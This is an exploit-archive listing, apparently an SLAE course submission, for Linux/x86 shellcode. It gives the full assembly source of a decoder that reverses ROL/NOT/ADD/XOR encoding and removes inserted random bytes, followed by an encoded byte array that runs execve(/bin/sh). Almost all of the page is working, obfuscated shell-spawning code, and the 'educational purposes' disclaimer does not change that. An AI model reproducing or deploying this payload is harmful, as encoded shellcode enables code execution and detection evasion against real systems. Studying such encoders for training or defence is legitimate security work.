Exploits / Vulnerability Discovered : 2020-01-08 |
Type : shellcode |
Platform : linux_x86
This exploit / vulnerability Linux/x86 random bytes encoder + xor/sub/not/ror execve(/bin/sh) shellcode (114 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-01
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 114 bytes
# SLAE-ID: SLAE - 1314
# Description: Linux/x86 encoding of random bytes + XOR/SUB/NOT/ROR and also decodes ROL/NOT/ADD/XOR execve(/bin/sh) shellcode
----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi
push esi
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov dl, len
rotate:
;; apply the decoding scheme
rol byte [esi], 4
not byte [esi]
add byte [esi], 2
xor byte [esi], 0x2c
inc esi
cmp cl, dl
je init
inc cl
jmp short rotate
init:
pop esi
lea edi, [esi +1]
xor eax, eax
mov al, 1
xor ecx, ecx
decode:
cmp cl, dl
je EncodedShellcode
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
inc cl
add al, 2
jmp short decode
call_shellcode:
call decoder
EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
len equ $-EncodedShellcode
--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------